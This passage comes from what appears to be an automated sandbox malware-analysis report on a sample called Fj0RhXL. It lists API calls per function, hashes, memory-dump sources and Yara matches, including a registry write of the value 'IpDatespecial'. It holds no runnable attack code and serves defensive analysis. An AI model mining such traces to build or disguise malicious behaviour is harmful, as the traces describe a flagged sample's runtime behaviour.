                                          • Opcode Fuzzy Hash: 34ef468bcf97d56ae04d17728a57798c68f0f7237951f085a20b859cb0cd334a
                                          • Instruction Fuzzy Hash: E73173BA7003059FDF18DE7DCC9486F77EAEBC4614B14862EE85A87744EE35E81187A0
                                          APIs
                                          • CheckDlgButton.USER32(?,000004D7,00000000), ref: 6C3AB843
                                          • CheckDlgButton.USER32(?,000004D7,00000001), ref: 6C3AB860
                                          • IsDlgButtonChecked.USER32(?,000004D6), ref: 6C3AB88F
                                          • CheckMenuItem.USER32(00009D14,00000008), ref: 6C3AB8D4
                                          • CheckMenuItem.USER32(00009D14,00000000), ref: 6C3AB907
                                          • EndDialog.USER32(?,00000001), ref: 6C3AB926
                                          • CheckDlgButton.USER32(?,000004D7,000004D7), ref: 6C3AB953
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Check$Button$ItemMenu$CheckedDialog
                                          • String ID:
                                          • API String ID: 1766801748-0
                                          • Opcode ID: 3a8422474808cb906431cf87109ee3842c4f7c01dd8790165c3d6fcff12e51d7
                                          • Instruction ID: 6addae581913f64b37b0641f774acd76320a74500eb3ffa912d82088422e908d
                                          • Opcode Fuzzy Hash: 3a8422474808cb906431cf87109ee3842c4f7c01dd8790165c3d6fcff12e51d7
                                          • Instruction Fuzzy Hash: 6631133264425CAFDB15AFA9CC48A663B78FB0674CF20052AFA51CA941C3B68477DFD0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __floor_pentium4_fseek_sprintf
                                          • String ID: %s%s%d$(/@l$CPJV_
                                          • API String ID: 2752894067-1028805631
                                          • Opcode ID: 20772facda88c00762fb24f7c41dac37de35e4a11f1249fcc2e6d062a18cc67e
                                          • Instruction ID: 68df006f1274b76f10319aae03daa5e8274ed31554d1d8ae74056d081d5794de
                                          • Opcode Fuzzy Hash: 20772facda88c00762fb24f7c41dac37de35e4a11f1249fcc2e6d062a18cc67e
                                          • Instruction Fuzzy Hash: 73214E72B1224566DB18DB798C05E9A77BD9B82368F10023AE454DF6C0EF34D8448F69
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D8A1C3
                                            • Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B19
                                            • Part of subcall function 03D99B04: __CxxThrowException@8.LIBCMT ref: 03D99B2E
                                            • Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B3F
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D8A1D7
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D8A1E9
                                          • _memmove.LIBCMT ref: 03D8A24B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                          • String ID: invalid string position$string too long
                                          • API String ID: 443534600-4289949731
                                          • Opcode ID: b84a10c91a00a9990941f5ab2a8af724b7aba9af4db6d601a114def57a22e19c
                                          • Instruction ID: 3df26ebb278c38274b3f44c4f2a6e346676501b69fd03dcf0d9ef92bf70e0578
                                          • Opcode Fuzzy Hash: b84a10c91a00a9990941f5ab2a8af724b7aba9af4db6d601a114def57a22e19c
                                          • Instruction Fuzzy Hash: 6621FB717002019FD724FF6C98D0B69B7AEEF91624B14021BE1128F691C762FD64C3B0
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,?,03D993B5,?,?,?,?,74DF23A0,00000000), ref: 03D9925D
                                          • CreateFileW.KERNEL32(03DC31A0,40000000,00000002,00000000,00000004,00000002,00000000,?,?,03D993B5,?,?,?,?,74DF23A0,00000000), ref: 03D99277
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 03D99292
                                          • lstrlenW.KERNEL32(?,00000000,00000000), ref: 03D9929F
                                          • WriteFile.KERNEL32(00000000,?,00000000), ref: 03D992AA
                                          • CloseHandle.KERNEL32(00000000), ref: 03D992B1
                                          • ReleaseMutex.KERNEL32(?), ref: 03D992BE
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
                                          • String ID:
                                          • API String ID: 4202892810-0
                                          • Opcode ID: 5b6af593cd5bc4999d34cca3b9a157e4c6e5dbf786b94da08e2a102e2057f7fb
                                          • Instruction ID: b886e52ee2c087df35bd9220c99c7c4bd5c1bfc94b0993ca0db2fab6e300f4a2
                                          • Opcode Fuzzy Hash: 5b6af593cd5bc4999d34cca3b9a157e4c6e5dbf786b94da08e2a102e2057f7fb
                                          • Instruction Fuzzy Hash: 2701A473250214FBE320BBA4AC0EF9B366CDB09B25F104704F715E63C4E7B459048765
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,03DB7760,00000008,03DA2A20,00000000,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C), ref: 03DA2929
                                          • __lock.LIBCMT ref: 03DA295D
                                            • Part of subcall function 03DA8DA3: __mtinitlocknum.LIBCMT ref: 03DA8DB9
                                            • Part of subcall function 03DA8DA3: __amsg_exit.LIBCMT ref: 03DA8DC5
                                            • Part of subcall function 03DA8DA3: EnterCriticalSection.KERNEL32(00000000,00000000,?,03DA2AF0,0000000D,03DB7788,00000008,03DA2BE7,00000000,?,03D9C743,00000000,03DB7688,00000008,03D9C7A8,?), ref: 03DA8DCD
                                          • InterlockedIncrement.KERNEL32(?), ref: 03DA296A
                                          • __lock.LIBCMT ref: 03DA297E
                                          • ___addlocaleref.LIBCMT ref: 03DA299C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                          • String ID: KERNEL32.DLL
                                          • API String ID: 637971194-2576044830
                                          • Opcode ID: c5e5525870b821f2807bd96a585a9b413c2f64330a23fa0825d2a657ad4fee64
                                          • Instruction ID: 98434e1fc3f6d6571336995e6b71e07e7c60df7dfd244b581344ab01027618f5
                                          • Opcode Fuzzy Hash: c5e5525870b821f2807bd96a585a9b413c2f64330a23fa0825d2a657ad4fee64
                                          • Instruction Fuzzy Hash: 8E018BB6444B00DFD720EF6AD90474AFBE0FF54320F204D0AD4AA9A7A0CBB0A644DB24
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,02F17B80,00000008,02F099B9,00000000,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C), ref: 02F098C2
                                          • __lock.LIBCMT ref: 02F098F6
                                            • Part of subcall function 02F0C255: __mtinitlocknum.LIBCMT ref: 02F0C26B
                                            • Part of subcall function 02F0C255: __amsg_exit.LIBCMT ref: 02F0C277
                                            • Part of subcall function 02F0C255: EnterCriticalSection.KERNEL32(00000000,00000000,?,02F09A89,0000000D,02F17BA8,00000008,02F09B80,00000000,?,02F07821,00000000,02F17AE0,00000008,02F07886,?), ref: 02F0C27F
                                          • InterlockedIncrement.KERNEL32(?), ref: 02F09903
                                          • __lock.LIBCMT ref: 02F09917
                                          • ___addlocaleref.LIBCMT ref: 02F09935
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                          • String ID: KERNEL32.DLL
                                          • API String ID: 637971194-2576044830
                                          • Opcode ID: 22d62b04d19f15531b7896fe205735050717c55ba9796f714bf8df9e68b88283
                                          • Instruction ID: 159b128538dba2f053215e3d2ab146212074d312b6c6b9c70ff7faf36988f894
                                          • Opcode Fuzzy Hash: 22d62b04d19f15531b7896fe205735050717c55ba9796f714bf8df9e68b88283
                                          • Instruction Fuzzy Hash: 8B01C471840700DFE7209FA5D98434AFBF1AF807A0F90890ED6DA562D0CBF0A644DF51
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 03D9647E
                                          • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 03D9648E
                                          • RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 03D964A5
                                          • RegCloseKey.ADVAPI32(?,?,00000004), ref: 03D964B0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Value$CloseDeleteOpen
                                          • String ID: Console$IpDatespecial
                                          • API String ID: 3183427449-1840232981
                                          • Opcode ID: 3b1b111a44fe8a6fdb29f6c77320c191e2944a5e0706600111b638a0e75b462e
                                          • Instruction ID: b20cbf98216fb875bd6915efe879a17402e7e6ffd32308b09ce8db219366de70
                                          • Opcode Fuzzy Hash: 3b1b111a44fe8a6fdb29f6c77320c191e2944a5e0706600111b638a0e75b462e
                                          • Instruction Fuzzy Hash: CEF08273244340EBD3209760AC4BF5AB764F788701F14490DBA4565285D660E224C765
                                          APIs
                                          • __getptd.LIBCMT ref: 03DA6C6C
                                            • Part of subcall function 03DA2A45: __getptd_noexit.LIBCMT ref: 03DA2A48
                                            • Part of subcall function 03DA2A45: __amsg_exit.LIBCMT ref: 03DA2A55
                                          • __getptd.LIBCMT ref: 03DA6C7D
                                          • __getptd.LIBCMT ref: 03DA6C8B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: MOC$RCC$csm
                                          • API String ID: 803148776-2671469338
                                          • Opcode ID: 856c58d99f932a3febb97830a2d2da109b140a3f6b64071b2c9b01318b2a212b
                                          • Instruction ID: 0a7349bddfca40de5a15237c79de0a16efd34f0aff72f5c56882c61d9ab2c8db
                                          • Opcode Fuzzy Hash: 856c58d99f932a3febb97830a2d2da109b140a3f6b64071b2c9b01318b2a212b
                                          • Instruction Fuzzy Hash: D3E01A39100A04CFE730EB6DC349B683BA5FB88A14F1D45A1E49CCB266C738E4508952
                                          APIs
                                          • __getptd.LIBCMT ref: 02F13522
                                            • Part of subcall function 02F099DE: __getptd_noexit.LIBCMT ref: 02F099E1
                                            • Part of subcall function 02F099DE: __amsg_exit.LIBCMT ref: 02F099EE
                                          • __getptd.LIBCMT ref: 02F13533
                                          • __getptd.LIBCMT ref: 02F13541
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: MOC$RCC$csm
                                          • API String ID: 803148776-2671469338
                                          • Opcode ID: f2a1e7849386d99612e5de526001b84564951c592f4ee1d89a7d1fe248cdfa0a
                                          • Instruction ID: 8254ccaccdf82adb8a6669aab0d411c3af1bfb0e93c3b3704a3eb0677d822449
                                          • Opcode Fuzzy Hash: f2a1e7849386d99612e5de526001b84564951c592f4ee1d89a7d1fe248cdfa0a
                                          • Instruction Fuzzy Hash: 28E048719151048FCB149BA4C4D976833D5FF84B94F5610E2D60DCB363E774D4509F52
                                          APIs
                                            • Part of subcall function 6C3CDB5F: _fprintf.LIBCMT ref: 6C3CDBEA
                                            • Part of subcall function 6C3CDB5F: _fprintf.LIBCMT ref: 6C3CDBFA
                                            • Part of subcall function 6C3CDB5F: _fprintf.LIBCMT ref: 6C3CDC5F
                                            • Part of subcall function 6C3CDB5F: _fprintf.LIBCMT ref: 6C3CDCA5
                                          • _sprintf.LIBCMT ref: 6C3B7FE7
                                          • _sprintf.LIBCMT ref: 6C3B816E
                                            • Part of subcall function 6C3B9525: _sprintf.LIBCMT ref: 6C3B9576
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _fprintf$_sprintf
                                          • String ID: %s%s%.3s %s %s (%cT Zone %s) %s%s%s$(Composite)$(No time or space)
                                          • API String ID: 364784897-2407286440
                                          • Opcode ID: b368fc730cb26049be964e21f6db65aac1d9c88c541c21f3d7575f7955336e9c
                                          • Instruction ID: 2b1bb9f13ca24f41cbb34456f8b96e3f579f9071be744809d7ce2dbe6a38f385
                                          • Opcode Fuzzy Hash: b368fc730cb26049be964e21f6db65aac1d9c88c541c21f3d7575f7955336e9c
                                          • Instruction Fuzzy Hash: 46C1F971B09502DBDF14FB698C81AA93374EB6731CB24465BD194E6E81DB328884CFB7
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __floor_pentium4
                                          • String ID:
                                          • API String ID: 4168288129-0
                                          • Opcode ID: 6b28c2e3a93db695878e0b39c1f587863dad8529fe1bf3755ccfcb69c222d12c
                                          • Instruction ID: 25afcedc78c885b0c56e5a04f0e92ed4a9556b4fd5b8eb31fa79d7fa9cff0249
                                          • Opcode Fuzzy Hash: 6b28c2e3a93db695878e0b39c1f587863dad8529fe1bf3755ccfcb69c222d12c
                                          • Instruction Fuzzy Hash: 0E418B71904D0EE2DF147FA2F5092EEBF34FB86395F920989D5D420494CF3A40B8878A
                                          APIs
                                          • _malloc.LIBCMT ref: 03D948FF
                                            • Part of subcall function 03D9AB3E: __FF_MSGBANNER.LIBCMT ref: 03D9AB57
                                            • Part of subcall function 03D9AB3E: __NMSG_WRITE.LIBCMT ref: 03D9AB5E
                                            • Part of subcall function 03D9AB3E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB83
                                          • _free.LIBCMT ref: 03D94923
                                          • _memset.LIBCMT ref: 03D9497B
                                            • Part of subcall function 03D952D0: GetObjectW.GDI32(?,00000054,?), ref: 03D952EE
                                          • CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 03D94993
                                          • _free.LIBCMT ref: 03D949A4
                                          • _free.LIBCMT ref: 03D949E3
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
                                          • String ID:
                                          • API String ID: 1756752955-0
                                          • Opcode ID: b08078b7d1c24388bba5920ba6e89f4f267ac68b02c69f1249a773b0989632e5
                                          • Instruction ID: 419f8d8db95689a455f16673014f7aeb2485b1cd9eb015234db726274114e4e4
                                          • Opcode Fuzzy Hash: b08078b7d1c24388bba5920ba6e89f4f267ac68b02c69f1249a773b0989632e5
                                          • Instruction Fuzzy Hash: 4F318BF2604315ABEB10DF2AE880B56B7ECFB48704F04813BDA098A642E7B0A555C7A1
                                          APIs
                                          • EnterCriticalSection.KERNEL32(000002FF), ref: 03D850AA
                                          • WSASetLastError.WS2_32(0000139F), ref: 03D850C2
                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 03D850CC
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterErrorLastLeave
                                          • String ID:
                                          • API String ID: 4082018349-0
                                          • Opcode ID: 517a395ba765925e5f9495c8f061e55b96884a4158839d0339f7fa916ae4a7fa
                                          • Instruction ID: dfad31ad33421323111048cbb6bcbf7be53921950a09af3c2e1969267770c215
                                          • Opcode Fuzzy Hash: 517a395ba765925e5f9495c8f061e55b96884a4158839d0339f7fa916ae4a7fa
                                          • Instruction Fuzzy Hash: 4C319076A04744DBD710EF94E845B6AB3A9FB4AB10F004A5EF916C7780E736F910CB60
                                          APIs
                                          • EnterCriticalSection.KERNEL32(000002FF), ref: 02F0509A
                                          • WSASetLastError.WS2_32(0000139F), ref: 02F050B2
                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 02F050BC
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterErrorLastLeave
                                          • String ID:
                                          • API String ID: 4082018349-0
                                          • Opcode ID: 0b5e3ec6c57d9e4c2ab17092fc7d7b4b9fcb7ad5d0c5db18245591f951496771
                                          • Instruction ID: 55ed7a58c91734ff6e56e804567b08cd535cde5f88903b21df0917a8a32fabad
                                          • Opcode Fuzzy Hash: 0b5e3ec6c57d9e4c2ab17092fc7d7b4b9fcb7ad5d0c5db18245591f951496771
                                          • Instruction Fuzzy Hash: 9631AD72A44248ABE710CF94DD85F6BB7E9FB48B50F80491EFA16C7780D776A810DB90
                                          APIs
                                          • DialogBoxParamA.USER32(000000CC,Function_0005A3C0,00000000), ref: 6C3AAD0E
                                          • IsDlgButtonChecked.USER32(?,000004B7), ref: 6C3AAD29
                                          • IsDlgButtonChecked.USER32(?,000004B8), ref: 6C3AAD3A
                                          • IsDlgButtonChecked.USER32(?,000004B9), ref: 6C3AAD4B
                                          • EndDialog.USER32(?,00000001), ref: 6C3AAD63
                                          • CheckRadioButton.USER32(?,000004B7,000004BA,000004B7), ref: 6C3AAD9E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Button$Checked$Dialog$CheckParamRadio
                                          • String ID:
                                          • API String ID: 248094426-0
                                          • Opcode ID: f7007bb722896f03c12eccf63f1d5724f20e61509012befa1bd673c1eeba5b58
                                          • Instruction ID: 630749c48bed15a346f9ed9d44eb5e14b6ae7d4c813a8c4f7d4f21c9b522b6c7
                                          • Opcode Fuzzy Hash: f7007bb722896f03c12eccf63f1d5724f20e61509012befa1bd673c1eeba5b58
                                          • Instruction Fuzzy Hash: 8E214972B90106AAEB006FB8CC24E693BADD702B1AF104B26F6A1D64C4D77CC4638D60
                                          APIs
                                            • Part of subcall function 6C3CD1C1: _fprintf.LIBCMT ref: 6C3CD23E
                                            • Part of subcall function 6C3CDCFF: MoveToEx.GDI32(00000003,?,00000000,?), ref: 6C3CDD56
                                            • Part of subcall function 6C3CDCFF: LineTo.GDI32(00000000,?), ref: 6C3CDD68
                                            • Part of subcall function 6C3CDCFF: SetPixel.GDI32(00000000,?,?,6C3CF814), ref: 6C3CDD86
                                            • Part of subcall function 6C3CDCFF: _fprintf.LIBCMT ref: 6C3CDDE6
                                          • __floor_pentium4.LIBCMT ref: 6C3C80EE
                                          • _sprintf.LIBCMT ref: 6C3C8275
